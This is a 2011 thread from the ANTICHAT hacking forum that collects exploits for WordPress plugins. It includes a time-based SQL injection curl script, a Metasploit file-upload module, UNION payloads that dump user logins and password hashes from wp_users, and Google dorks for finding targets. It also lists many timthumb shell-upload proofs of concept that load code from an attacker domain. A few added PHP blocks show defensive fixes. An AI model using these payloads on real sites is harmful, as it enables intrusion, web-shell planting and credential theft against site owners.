ANTICHAT: a forum on information security, OSINT and technology
ANTICHAT is a Russian-language community for security, OSINT and programming.
The forum previously ran on the domains antichat.ru, antichat.com and antichat.club,
and is now available again at a new address:
forum.antichat.xyz.
The forum has been restored and continues to develop: archived threads are available, and new discussions and materials are being added.
⚠️ Old accounts cannot be restored; you need to register again.

18.09.2011, 18:15
Regular
Registered: 02.11.2009
Posts: 341
Time on forum: 599124
Reputation: 65

WordPress WP e-Commerce plugin
---------------
PoC (POST data)
---------------
http://www.сайт.com/?chronopay_callback=true
cs2=chronopay&cs1=-1 AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)%23&cs3=123f7bcd4ba53fade05886a7e77bf045&transaction_type=rebill
e.g.
#!/bin/bash
payload="-1 AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)#"
hash=`echo -n $payload | md5sum | tr -d '\n' | sed 's/\s*-\s*//g' | md5sum | tr -d '\n' | sed 's/\s*-\s*//g'`
curl --data "cs2=chronopay&cs1=$payload&cs3=$hash&transaction_type=rebill" http://www.site.com/?chronopay_callback=true
---------------
Vulnerable code
---------------
./wp-e-commerce/wp-shopping-cart.php:

class WP_eCommerce {
    function WP_eCommerce() {
        add_action( 'plugins_loaded', array( $this, 'init' ), 8 );
    }
    function init() {
        ...
        $this->load();
        ...
    }
    function load() {
        ...
        wpsc_core_load_gateways();
        ...
    }
    ...
$wpec = new WP_eCommerce();

./wp-e-commerce/wpsc-core/wpsc-functions.php:

function wpsc_core_load_gateways() {
    global $nzshpcrt_gateways, $num, $wpsc_gateways,$gateway_checkout_form_fields;
    $gateway_directory = WPSC_FILE_PATH . '/wpsc-merchants';
    $nzshpcrt_merchant_list = wpsc_list_dir( $gateway_directory );
    $num = 0;
    foreach ( $nzshpcrt_merchant_list as $nzshpcrt_merchant ) {
        if ( stristr( $nzshpcrt_merchant, '.php' ) ) {
            require( WPSC_FILE_PATH . '/wpsc-merchants/' . $nzshpcrt_merchant );
        }

./wp-e-commerce/wpsc-merchants/chronopay.php:

function nzshpcrt_chronopay_callback()
{
    ...
    if(isset($_GET['chronopay_callback']) && ($_GET['chronopay_callback'] == 'true') && ($_POST['cs2'] == 'chronopay'))
    {
        $salt = get_option('chronopay_salt');
        // - this is by default '' and set only if explicitly stated
        // inside Store Settings->Payments->General Settings->
        // Chronopay->Edit->Security Key
        // - problem is that there are more popular payment gateways enlisted (e.g.
        // Google Checkout and PayPal) and if that setting is not explicitly set
        // it wide opens the door to the potential attacker
        $gen_hash = md5($salt . md5($_POST['cs1'] . $salt));
        if($gen_hash == $_POST['cs3'])
        {
            ...
            $sessionid = trim(stripslashes($_POST['cs1']));
            $transaction_id = trim(stripslashes($_POST['transaction_id']));
            $verification_data['trans_id'] = trim(stripslashes($_POST['transaction_id']));
            $verification_data['trans_type'] = trim(stripslashes($_POST['transaction_type']));
            switch($verification_data['trans_type'])
            {
                ...
                case 'rebill':
                    $wpdb->query("UPDATE `".WPSC_TABLE_PURCHASE_LOGS."` SET
                        `processed` = '2',
                        `transactid` = '".$transaction_id."',
                        `date` = '".time()."'
                        WHERE `sessionid` = ".$sessionid." LIMIT 1");
                    ...
add_action('init', 'nzshpcrt_chronopay_callback');
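
The callback check quoted in the post above, rewritten so that an unset Security Key disables the callback and the fields are validated before use. This is an added example, not part of the original post and not WP e-Commerce code; the function names, the numeric session id format and the transaction id character set are assumptions.

```php
<?php
// Added example, not WP e-Commerce code. Function names are hypothetical and
// the field formats (numeric session id, transaction id charset) are assumptions.

/** Hash scheme shown in the post: md5(salt . md5(cs1 . salt)). */
function chronopay_expected_hash(string $cs1, string $secret): string
{
    return md5($secret . md5($cs1 . $secret));
}

/**
 * Validate a callback. Returns the cleaned fields, or null when the request
 * must be rejected before anything touches the database.
 */
function chronopay_validate_callback(array $post, string $secret): ?array
{
    // 1. With an empty key the "signature" is md5(md5(cs1)), which any client
    //    can compute. An unset key therefore means "callback disabled".
    if ($secret === '') {
        return null;
    }

    // 2. Every field must be present and a string (cs1[]=x arrives as an array).
    foreach (['cs1', 'cs2', 'cs3', 'transaction_id', 'transaction_type'] as $field) {
        if (!isset($post[$field]) || !is_string($post[$field])) {
            return null;
        }
    }
    if ($post['cs2'] !== 'chronopay') {
        return null;
    }

    // 3. Constant-time, type-strict comparison instead of loose ==.
    if (!hash_equals(chronopay_expected_hash($post['cs1'], $secret), $post['cs3'])) {
        return null;
    }

    // 4. A valid signature authenticates the sender; it does not make the
    //    value safe to splice into SQL. Enforce the expected shape as well.
    $sessionId = trim($post['cs1']);
    if (preg_match('/^[0-9]{1,20}$/D', $sessionId) !== 1) {
        return null;
    }
    $transactionId = trim($post['transaction_id']);
    if (preg_match('/^[A-Za-z0-9_-]{1,64}$/D', $transactionId) !== 1) {
        return null;
    }
    // Only the branch visible in the post is listed here.
    if (!in_array($post['transaction_type'], ['rebill'], true)) {
        return null;
    }

    return [
        'sessionid' => $sessionId,
        'transaction_id' => $transactionId,
        'transaction_type' => $post['transaction_type'],
    ];
}

// Constructed sample requests (not captured traffic).
$secret = 'constructed-demo-key';
$valid = [
    'cs1' => '1231316365000',
    'cs2' => 'chronopay',
    'transaction_id' => 'TX-1001',
    'transaction_type' => 'rebill',
];
$valid['cs3'] = chronopay_expected_hash($valid['cs1'], $secret);

// Same request, but with the hash computed from an empty key.
$unsigned = $valid;
$unsigned['cs3'] = chronopay_expected_hash($unsigned['cs1'], '');

// Correctly signed, but cs1 is not a numeric session id.
$malformed = $valid;
$malformed['cs1'] = '12 AND 1=1';
$malformed['cs3'] = chronopay_expected_hash($malformed['cs1'], $secret);

$cases = [
    'valid, key configured' => [$valid, $secret],
    'valid fields, key left empty in settings' => [$valid, ''],
    'hash computed with empty key' => [$unsigned, $secret],
    'signed but non-numeric cs1' => [$malformed, $secret],
];
foreach ($cases as $label => [$request, $key]) {
    $result = chronopay_validate_callback($request, $key);
    printf("%-42s %s\n", $label, $result === null ? 'rejected' : 'accepted');
}
```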

18.09.2011, 18:17
Regular
Registered: 02.11.2009
Posts: 341
Time on forum: 599124
Reputation: 65

Wordpress 1 Flash Gallery Plugin Arbitrary File Upload Exploit (MSF)
# Google search: inurl:"wp-content/plugins/1-flash-gallery"
require 'msf/core'
class Metasploit3 '1 Flash Gallery Wordpress Plugin File Upload Exploit',
'Description' => %q{
This module exploits an arbitrary file upload vulnerability in
the '1 Flash Gallery' Wordpress plugin.
},
'Author' => [ 'Ben Schmidt'],
'License' => MSF_LICENSE,
'References' => ["http://spareclockcycles.org/2011/09/06/flash-gallery-arbitrary-file-upload/" ],
'Privileged' => false,
'Payload' =>
{
'DisableNops' => true,
# Arbitrary big number. The payload gets sent as an HTTP
# POST request, so it's possible this might be smaller (maybe?)
# but very unlikely.
'Space' => 262144, # 256k
},
'Platform' => 'php',
'Arch' => ARCH_PHP,
'Targets' => [[ 'Automatic', { }]],
'DefaultTarget' => 0,
'DisclosureDate' => 'Sept 6, 2011'
))
register_options([
OptString.new('URI', [true, "Path to Wordpress", "/"]),
], self.class)
end
def exploit
boundary = rand_text_alphanumeric(6)
fn = rand_text_alphanumeric(8)
data = "--#{boundary}\r\nContent-Disposition: form-data; name=\"Filedata\"; "
data datastore['URI'] + "/wp-content/plugins/1-flash-gallery/upload.php?action=uploadify&fileext=php",
'method' => 'POST',
'data' => data,
'headers' =>
{
'Content-Type' => 'multipart/form-data; boundary=' + boundary,
'Content-Length' => data.length,
}
}, 25)
if (res)
print_status("Successfully uploaded shell.")
shell_path = res.body.split("_")[0]
print_status("Trying to access shell at #{shell_path}...")
res = send_request_raw({
'uri' => datastore['URI'] + shell_path,
'method' => 'GET',
}, 0.01)
else
print_error("Error uploading shell")
end
handler
end
end

27.09.2011, 19:53
Regular
Registered: 17.12.2008
Posts: 353
Time on forum: 919131
Reputation: 74

Guys, can you tell me if there is an up-to-date WP plugin scanner that would show which plugins are installed?

27.09.2011, 19:58
Learner
Registered: 03.02.2009
Posts: 49
Time on forum: 3317712
Reputation: 403

fl00der/thread291666.html

29.09.2011, 23:47
Newbie
Registered: 14.08.2005
Posts: 1
Time on forum: 339
Reputation: 0

Can you recommend a good article on installing WP on IIS 7

30.09.2011, 19:08
Guest
Posts: n/a
Time on forum: 4100
Reputation: 74

easy-color-manager #plugin# shell upload
easy-color-manager.php
PHP code:
...
background_part_array) as $key){
    if($this->background_part_array[$key]['type'] === 'navigation-02'){
        echo ''.$this->background_part_array[$key]['name'] . ' 背景';
        echo ''.$this->background_part_array[$key]['name'] . ' パネル';
    } else {
        echo ''.$this->background_part_array[$key]['name'] ;
    }
}
?>
" />
表示方法の設定は「背景画像オプション」、削除は「サイトの詳細設定」でおこなってください。
...
shell:
Code:
http://wp/wp-content/plugins/easycolmanager/uploads/shell.php
glossy #plugin# sql-inj
glossy.admin.addEntry.php
PHP code:
...
$entryName = $_POST['gs_entry_name'];
$entryTitle = $_POST['gs_entry_title'];
$entryLink = $_POST['gs_entry_link'];
$entryDimensions = $_POST['gs_entry_dimensions'];
$entryContents = $_POST['gs_entry_contents'];
$saveEntry = gs_save_entry($entryName, $entryTitle, $entryLink, $entryDimensions, $entryContents, $pageAction, $entryOriginalName);
// If $saveEntry is empty (no errors) and we've been adding, switch to editing mode
if (empty($saveEntry))
{
    $completedAction = $pageAction;
    $pageAction = "Edit";
    $entryOriginalName = $entryName;
}
...
glossy.admin.addEntry.php
PHP code:
...
} else if ($entryAction == "Add" || $entryName != $entryOriginalName) {
    $query = $wpdb->prepare("SELECT gs_name FROM ".$gs_tableName." WHERE gs_name = '%s';", $entryName);
    $existingName = $wpdb->get_var($query);
    if ($existingName)
    {
        $saveData = false;
        $errorFields['entryName'] = 'taken';
    }
}
...
exploit:
Code:
POST: wp-content/plugins/glossy/glossy.admin.addEntry.php
data: gs_entry_title=&gs_entry_link=&gs_entry_dimensions=&gs_entry_contents=&gs_entry_name=aaa+union+select+concat_ws(0x3a,user_login,user_pass)+from+wp_users+--+
google-button-wp #plugin# passive XSS
google.php
PHP code:
...
'.__("General options", 'menu-test' ).'
'.__("Active share buttons", 'menu-test' ).':
';
foreach ($active_buttons as $name => $text) {
    $checked = ($option['active_buttons'][$name]) ? 'checked="checked"' : '';
    $out .= '
'
    . __($text, 'menu-test' ).'&nbsp;&nbsp;';
}
$out .= '
'.__("Show buttons in these pages", 'menu-test' ).':
';
foreach ($show_in as $name => $text) {
    $checked = ($option['show_in'][$name]) ? 'checked="checked"' : '';
    $out .= '
'
    . __($text, 'menu-test' ).'&nbsp;&nbsp;';
}
$out .= '
'.__("Position", 'menu-test' ).':
'.__('before the post', 'menu-test' ).'
'.__('after the post', 'menu-test' ).'
'.__('before and after the post', 'menu-test' ).'
'.__("Google +1 options", 'menu-test' ).'
'.__("Button width", 'menu-test' ).':
px
'.__("default: 90", 'menu-test' ).'
'.__("Show counter", 'menu-test' ).':
...
Vulnerable input name "px", ex: alert()
polylang #plugin# double sql-inj
languages-form.php
PHP code:
...
term_id;?>" />
name;?>" size="40" aria-required="true" />
description;?>" size="40" aria-required="true" />
slug;?>" size="40" />
...
admin.php
PHP code:
...
if (isset($_POST['lang'])) {
    // Update links to this language in posts and terms in case the slug has been modified
    $lang = $this->get_language($_POST['lang']);
    $old_slug = $lang->slug;
    if ($old_slug != $_POST['slug']) {
        // update the language slug in posts meta
...
exploit #1:
Code:
POST: wp-contents/plugins/polylang/admin.php
data: lang=albanskiy&slug=newnew&set=1+union+select+concat_ws(0x3a,user_login,user_pass)+from+wp_users+--+&time=now
uninstall.php
PHP code:
...
$languages = get_terms('language', array('hide_empty'=>false));
foreach ($languages as $lang) {
    // delete references to this language in all posts
    $args = array('numberposts'=> -1, 'post_type' => 'any', 'post_status' => 'any');
    $posts = get_posts($args);
    foreach ($posts as $post) {
        delete_post_meta($post->ID, '_lang-'.$lang->slug);
    }
    // delete references to this language in categories & post tags
    $terms = get_terms(array('category', 'post_tag'), 'get=all');
    foreach ($terms as $term) {
        delete_metadata('term', $term->term_id, '_language');
        delete_metadata('term', $term->term_id, '_lang-'.$lang->slug);
    }
    // finally delete the language itself
    wp_delete_term($lang->term_id, 'language');
}
// delete the termmeta table only if it is empty as other plugins may use it
$table = $wpdb->termmeta;
$count = $wpdb->get_var("SELECT COUNT(*) FROM $table WHERE poly_id=$_GET['id']");
if (!$count) {
    $wpdb->query("DROP TABLE $table;");
    unset($wpdb->termmeta);
}
...
exploit #2:
Code:
http://wp/wp-contents/plugins/polylang/uninstall.php?id=-666666666+union+select+1,2,3,4,5,group_concat(user_login,0x3a,user_pass+separator+0x3c62723e)+from+wp_users+--

13.10.2011, 20:37
Guest
Posts: n/a
Time on forum: 5429
Reputation: -1

Code:
# Exploit Title: Multiple Wordpress timthumb.php reuse vulnerabilities
# Date: 09/19/2011
# Author: Ben Schmidt (supernothing (AT) spareclockcycles.org @_supernothing)
---
Description
---
The following Wordpress plugins reuse a vulnerable version of the timthumb.php library.
By hosting a malicious GIF file with PHP code appended to the end on an attacker controlled
domain such as blogger.com.evil.com and then providing it to the script through the
src GET parameter, it is possible to upload a shell and execute arbitrary code on the webserver.
Reference: http://www.exploit-db.com/exploits/17602/
# Plugin: Category Grid View Gallery Wordpress plugin Shell Upload vulnerability
# Google Dork: inurl:wp-content/plugins/category-grid-view-gallery
# Software Link: http://wordpress.org/extend/plugins/category-grid-view-gallery/download/
# Version: 0.1.1
---
PoC
---
http://SERVER/WP_PATH/wp-content/plugins/category-grid-view-gallery/includes/timthumb.php?src=MALICIOUS_URL
The uploaded shell can be found at /wp-content/plugins/category-grid-view-gallery/cache/externel_md5(src).php
# Plugin: Auto Attachments Wordpress plugin Shell Upload vulnerability
# Google Dork: inurl:wp-content/plugins/auto-attachments
# Software Link: http://wordpress.org/extend/plugins/auto-attachments/download/
# Version: 0.2.9
---
PoC
---
http://SERVER/WP_PATH/wp-content/plugins/auto-attachments/thumb.php?src=MALICIOUS_URL
The uploaded shell can be found at /wp-content/plugins/auto-attachments/cache/external_md5(src).php
# Plugin: WP Marketplace Wordpress plugin Shell Upload vulnerability
# Google Dork: inurl:wp-content/plugins/wp-marketplace
# Software Link: http://wordpress.org/extend/plugins/wp-marketplace/download/
# Version: 1.1.0
---
PoC
---
http://SERVER/WP_PATH/wp-content/plugins/wp-marketplace/libs/timthumb.php?src=MALICIOUS_URL
The uploaded shell can be found at /wp-content/plugins/wp-marketplace/libs/cache/external_md5(src).php
# Plugin: DP Thumbnail Wordpress plugin Shell Upload vulnerability
# Google Dork: inurl:wp-content/plugins/dp-thumbnail
# Software Link: http://wordpress.org/extend/plugins/dp-thumbnail/download/
# Version: 1.0
---
PoC
---
http://SERVER/WP_PATH/wp-content/plugins/dp-thumbnail/timthumb/timthumb.php?src=MALICIOUS_URL
The uploaded shell can be found at /wp-content/plugins/dp-thumbnail/timthumb/cache/external_md5(src).php
# Plugin: Vk Gallery Wordpress plugin Shell Upload vulnerability
# Google Dork: inurl:wp-content/plugins/vk-gallery
# Software Link: http://wordpress.org/extend/plugins/vk-gallery/download/
# Version: 1.1.0
---
PoC
---
http://SERVER/WP_PATH/wp-content/plugins/vk-gallery/lib/timthumb.php?src=MALICIOUS_URL
The uploaded shell can be found at /wp-content/plugins/vk-gallery/lib/cache/md5(src).php
# Plugin: Rekt Slideshow Wordpress plugin Shell Upload vulnerability
# Google Dork: inurl:wp-content/plugins/rekt-slideshow
# Software Link: http://wordpress.org/extend/plugins/rekt-slideshow/download/
# Version: 1.0.5
---
PoC
---
http://SERVER/WP_PATH/wp-content/plugins/rekt-slideshow/picsize.php?src=MALICIOUS_URL
Must first base64 encode the URL.
The uploaded shell can be found at /wp-content/plugins/rekt-slideshow/cache/md5(src).php
# Plugin: CAC Featured Content Wordpress plugin Shell Upload vulnerability
# Google Dork: inurl:wp-content/plugins/cac-featured-content
# Software Link: http://wordpress.org/extend/plugins/cac-featured-content/download/
# Version: 0.8
---
PoC
---
http://SERVER/WP_PATH/wp-content/plugins/cac-featured-content/timthumb.php?src=MALICIOUS_URL
The uploaded shell can be found at /wp-content/plugins/cac-featured-content/temp/md5(src).php
# Plugin: Rent A Car Wordpress plugin Shell Upload vulnerability
# Google Dork: inurl:wp-content/plugins/rent-a-car
# Software Link: http://wordpress.org/extend/plugins/rent-a-car/download/
# Version: 1.0
---
PoC
---
http://SERVER/WP_PATH/wp-content/plugins/rent-a-car/libs/timthumb.php?src=MALICIOUS_URL
The uploaded shell can be found at /wp-content/plugins/rent-a-car/libs/cache/external_md5(src).php
# Plugin: LISL Last Image Slider Wordpress plugin Shell Upload vulnerability
# Google Dork: inurl:wp-content/plugins/lisl-last-image-slider
# Software Link: http://wordpress.org/extend/plugins/lisl-last-image-slider/download/
# Version: 1.0
---
PoC
---
http://SERVER/WP_PATH/wp-content/plugins/lisl-last-image-slider/timthumb.php?src=MALICIOUS_URL
The uploaded shell can be found at /wp-content/plugins/lisl-last-image-slider/cache/external_md5(src).php
# Plugin: Islidex Wordpress plugin Shell Upload vulnerability
# Google Dork: inurl:wp-content/plugins/islidex
# Software Link: http://wordpress.org/extend/plugins/islidex/download/
# Version: 2.7
---
PoC
---
http://SERVER/WP_PATH/wp-content/plugins/islidex/js/timthumb.php?src=MALICIOUS_URL
The uploaded shell can be found at /wp-content/plugins/islidex/js/cache/md5(src).php
# Plugin: Kino Gallery Wordpress plugin Shell Upload vulnerability
# Google Dork: inurl:wp-content/plugins/kino-gallery
# Software Link: http://wordpress.org/extend/plugins/kino-gallery/download/
# Version: 1.0
---
PoC
---
http://SERVER/WP_PATH/wp-content/plugins/kino-gallery/timthumb.php?src=MALICIOUS_URL
The uploaded shell can be found at /wp-content/plugins/kino-gallery/cache/external_md5(src).php
# Plugin: Cms Pack Wordpress plugin Shell Upload vulnerability
# Google Dork: inurl:wp-content/plugins/cms-pack
# Software Link: http://wordpress.org/extend/plugins/cms-pack/download/
# Version: 1.3
---
PoC
---
http://SERVER/WP_PATH/wp-content/plugins/cms-pack/timthumb.php?src=MALICIOUS_URL
The uploaded shell can be found at /wp-content/uploads/cms-pack-cache/external_md5(src).php
# Plugin: A Gallery Wordpress plugin Shell Upload vulnerability
# Google Dork: inurl:wp-content/plugins/a-gallery
# Software Link: http://wordpress.org/extend/plugins/a-gallery/download/
# Version: 0.9
---
PoC
---
http://SERVER/WP_PATH/wp-content/plugins/a-gallery/timthumb.php?src=MALICIOUS_URL
The uploaded shell can be found at /wp-content/plugins/a-gallery/cache/external_md5(src).php
# Plugin: Category List Portfolio Page Wordpress plugin Shell Upload vulnerability
# Google Dork: inurl:wp-content/plugins/category-list-portfolio-page
# Software Link: http://wordpress.org/extend/plugins/category-list-portfolio-page/download/
# Version: 0.9
---
PoC
---
http://SERVER/WP_PATH/wp-content/plugins/category-list-portfolio-page/scripts/timthumb.php?src=MALICIOUS_URL
The uploaded shell can be found at /wp-content/plugins/category-list-portfolio-page/scripts/cache/external_md5(src).php
# Plugin: Really Easy Slider Wordpress plugin Shell Upload vulnerability
# Google Dork: inurl:wp-content/plugins/really-easy-slider
# Software Link: http://wordpress.org/extend/plugins/really-easy-slider/download/
# Version: 0.1
---
PoC
---
http://SERVER/WP_PATH/wp-content/plugins/really-easy-slider/inc/thumb.php?src=MALICIOUS_URL
The uploaded shell can be found at /wp-content/plugins/really-easy-slider/inc/cache/external_md5(src).php
# Plugin: Verve Meta Boxes Wordpress plugin Shell Upload vulnerability
# Google Dork: inurl:wp-content/plugins/verve-meta-boxes
# Date: 09/19/2011
# Author: Ben Schmidt (supernothing (AT) spareclockcycles.org @_supernothing)
# Software Link: http://wordpress.org/extend/plugins/verve-meta-boxes/download/
# Version: 1.2.8
---
PoC
---
http://SERVER/WP_PATH/wp-content/plugins/verve-meta-boxes/tools/timthumb.php?src=MALICIOUS_URL
The uploaded shell can be found at /wp-content/plugins/verve-meta-boxes/tools/cache/external_md5(src).php
# Plugin: User Avatar Wordpress plugin shell upload vulnerability
# Google Dork: inurl:wp-content/plugins/user-avatar
# Software Link: http://wordpress.org/extend/plugins/user-avatar/download/
# Version: 1.3.7
---
PoC
---
http://SERVER/WP_PATH/wp-content/plugins/user-avatar/user-avatar-pic.php?id=0&allowedSites[]=blogger.com&src=http://blogger.com.evil.com/poc.php
Requires register_globals to be enabled and at least one user account to have an avatar directory.
The uploaded shell can be found at /wp-content/uploads/avatars/$id/external_md5(src).php
# Plugin: Extend Wordpress Wordpress plugin Shell Upload vulnerability
# Google Dork: inurl:wp-content/plugins/extend-wordpress
# Software Link: http://wordpress.org/extend/plugins/extend-wordpress/download/
# Version: 1.3.7
---
PoC
---
http://SERVER/WP_PATH/wp-content/plugins/extend-wordpress/helpers/timthumb/image.php?src=MALICIOUS_URL
The uploaded shell can be found at /wp-content/plugins/extend-wordpress/helpers/timthumb/cache/external_md5(src).php
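
The two weaknesses the advisory above depends on are a remote host that only has to contain an allowed name (blogger.com.evil.com) and a cache file written with a .php extension. The sketch below shows a strict host check next to the weak one, and a cache name derived from the detected image type. It is an added example, not part of the original post and not timthumb code; the function names and the allowlist are hypothetical, and the substring check is a model of the behaviour the advisory describes.

```php
<?php
// Added example, not timthumb code. Function names and the allowlist are
// hypothetical; the substring check models the behaviour the advisory relies on.

/** Weak form: the allowed name only has to appear somewhere in the host. */
function host_allowed_substring(string $url, array $allowedSites): bool
{
    $host = strtolower((string) parse_url($url, PHP_URL_HOST));
    foreach ($allowedSites as $site) {
        if ($host !== '' && strpos($host, strtolower($site)) !== false) {
            return true;
        }
    }
    return false;
}

/** Strict form: http(s) only, host equals an allowed name or is a subdomain of it. */
function host_allowed_strict(string $url, array $allowedSites): bool
{
    $parts = parse_url($url);
    if (!is_array($parts) || !isset($parts['scheme'], $parts['host'])) {
        return false;
    }
    if (!in_array(strtolower($parts['scheme']), ['http', 'https'], true)) {
        return false;
    }
    $host = rtrim(strtolower($parts['host']), '.');
    foreach ($allowedSites as $site) {
        $site = strtolower($site);
        $suffix = '.' . $site;
        if ($host === $site || substr($host, -strlen($suffix)) === $suffix) {
            return true;
        }
    }
    return false;
}

/**
 * Name the cache file from the detected image type, never from the URL.
 * Returns null when the body does not start with a known image signature.
 * Re-encoding the image before saving would additionally drop trailing data.
 */
function cache_filename(string $src, string $body): ?string
{
    $signatures = [
        'gif' => 'GIF8',
        'png' => "\x89PNG\r\n\x1a\n",
        'jpg' => "\xFF\xD8\xFF",
    ];
    foreach ($signatures as $ext => $magic) {
        if (strncmp($body, $magic, strlen($magic)) === 0) {
            return 'external_' . md5($src) . '.' . $ext;
        }
    }
    return null;
}

$allowed = ['blogger.com']; // constructed allowlist
$urls = [
    'http://blogger.com.evil.com/poc.php', // example host from the advisory
    'http://photos.blogger.com/pic.gif',   // constructed
    'ftp://blogger.com/pic.gif',           // constructed
];
foreach ($urls as $url) {
    printf(
        "%-38s substring=%s strict=%s\n",
        $url,
        var_export(host_allowed_substring($url, $allowed), true),
        var_export(host_allowed_strict($url, $allowed), true)
    );
}

// Constructed body: a GIF header followed by bytes that are not image data.
$body = 'GIF89a' . str_repeat("\0", 16) . 'trailing non-image bytes';
echo cache_filename('http://photos.blogger.com/pic.gif', $body), "\n";
```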

13.10.2011, 20:49
Guest
Posts: n/a
Time on forum: 5429
Reputation: -1

Code:
# Exploit Title: WordPress Mingle Forum plugin 1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)
e.g.
curl --data "wpf_security_check=MhWNow%3D%3D&wpf_security_code=fail&edit_post_submit=1&message=test&edit_post_subject=test&thread_id=1&edit_post_id=-1 AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)" http://www.site.com/wp-content/plugins/mingle-forum/wpf-insert.php
---------------
Vulnerable code
---------------
if (!isset($_POST['edit_post_submit'])) {
    $errormsg = apply_filters('wpwf_check_guestinfo',"");
    if ($errormsg != "") {
        $error = true;
        wp_die($errormsg);
    }
}
if($options['forum_captcha'] == true && !$user_ID){
    include_once(WPFPATH."captcha/shared.php");
    $wpf_code = wpf_str_decrypt($_POST['wpf_security_check']); // wpf_str_decrypt("MhWNow==") == "fail"
    if(($wpf_code == $_POST['wpf_security_code']) && (!empty($wpf_code))) {
        // do nothing
    }
    else {
        $error = true;
        $msg = __("Security code does not match", "mingleforum");
        wp_die($msg);
    }
}
...
if(isset($_POST['edit_post_submit'])){
    $myReplaceSub = array("'", "\\");
    $subject = str_replace($myReplaceSub, "", $mingleforum->input_filter($_POST['edit_post_subject']));
    $content = $mingleforum->input_filter($_POST['message']);
    $thread = $mingleforum->check_parms($_POST['thread_id']);
    $edit_post_id = $_POST['edit_post_id'];
    if($subject == ""){
        $msg .= "".__("An error occured", "mingleforum")."";
        $msg .= ("".__("You must enter a subject", "mingleforum")."");
        $error = true;
    }
    elseif($content == ""){
        $msg .= "".__("An error occured", "mingleforum")."";
        $msg .= ("".__("You must enter a message", "mingleforum")."");
        $error = true;
    }
    if ($error) wp_die($msg);
    //SECURITY FIX NEEDED t_posts SET text = '$content', subject = '$subject' WHERE id = $edit_post_id");
    $wpdb->query($wpdb->prepare($sql)); // misusage of prepare statement(s)

13.10.2011, 20:55
Guest
Posts: n/a
Time on forum: 5429
Reputation: -1

WordPress Collision Testimonials plugin 1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)
---------------
Vulnerable code
---------------
if (isset($_GET['featQuote'])) {
    $id = $_GET['id'];
    mysql_query("UPDATE $testimonials SET featured=1 WHERE id=$id");
};
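
Both the Mingle Forum snippet (prepare() called on a finished SQL string) and the Collision Testimonials snippet above put a request value into the query text before the database layer sees it. The sketch below contrasts that pattern with a validated, bound integer id. It is an added example, not part of the original posts and not plugin code; PDO with in-memory SQLite stands in for MySQL and $wpdb, and the function names are hypothetical.

```php
<?php
// Added example, not plugin code. PDO with in-memory SQLite stands in for
// MySQL and $wpdb (assumption); function names are hypothetical.

function make_demo_db(): PDO
{
    $pdo = new PDO('sqlite::memory:');
    $pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $pdo->exec('CREATE TABLE testimonials (id INTEGER PRIMARY KEY, featured INTEGER NOT NULL DEFAULT 0)');
    $pdo->exec('INSERT INTO testimonials (id) VALUES (1), (2), (3)');
    return $pdo;
}

/**
 * Pattern from the posts: the request value is concatenated into the SQL text
 * and only then handed to prepare(). No placeholder is left, so nothing is bound.
 */
function feature_quote_interpolated(PDO $pdo, string $id): int
{
    $stmt = $pdo->prepare("UPDATE testimonials SET featured = 1 WHERE id = $id");
    $stmt->execute();
    return $stmt->rowCount();
}

/**
 * Corrected form: validate the id as an integer, keep the SQL text constant,
 * and pass the value separately.
 * WordPress equivalent: $wpdb->prepare("UPDATE ... WHERE id = %d", $id).
 */
function feature_quote_bound(PDO $pdo, string $id): int
{
    $value = filter_var($id, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($value === false) {
        throw new InvalidArgumentException('id must be a positive integer');
    }
    $stmt = $pdo->prepare('UPDATE testimonials SET featured = 1 WHERE id = :id');
    $stmt->bindValue(':id', $value, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->rowCount();
}

function featured_count(PDO $pdo): int
{
    return (int) $pdo->query('SELECT COUNT(*) FROM testimonials WHERE featured = 1')->fetchColumn();
}

// Constructed inputs: one well-formed id and one value that is not an integer.
foreach (['2', '2 OR 1=1'] as $input) {
    $pdo = make_demo_db();
    feature_quote_interpolated($pdo, $input);
    $interpolated = featured_count($pdo);

    $pdo = make_demo_db();
    try {
        feature_quote_bound($pdo, $input);
        $bound = featured_count($pdo) . ' row(s) featured';
    } catch (InvalidArgumentException $e) {
        $bound = 'rejected';
    }
    printf("input %-12s interpolated: %d row(s) featured, bound: %s\n", "'$input'", $interpolated, $bound);
}
```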

19.10.2011, 02:14
Forum member
Registered: 31.03.2008
Posts: 160
Time on forum: 706093
Reputation: 97

Has anyone worked this SQL injection? I never managed to upload a shell; if it works for anyone, post about it..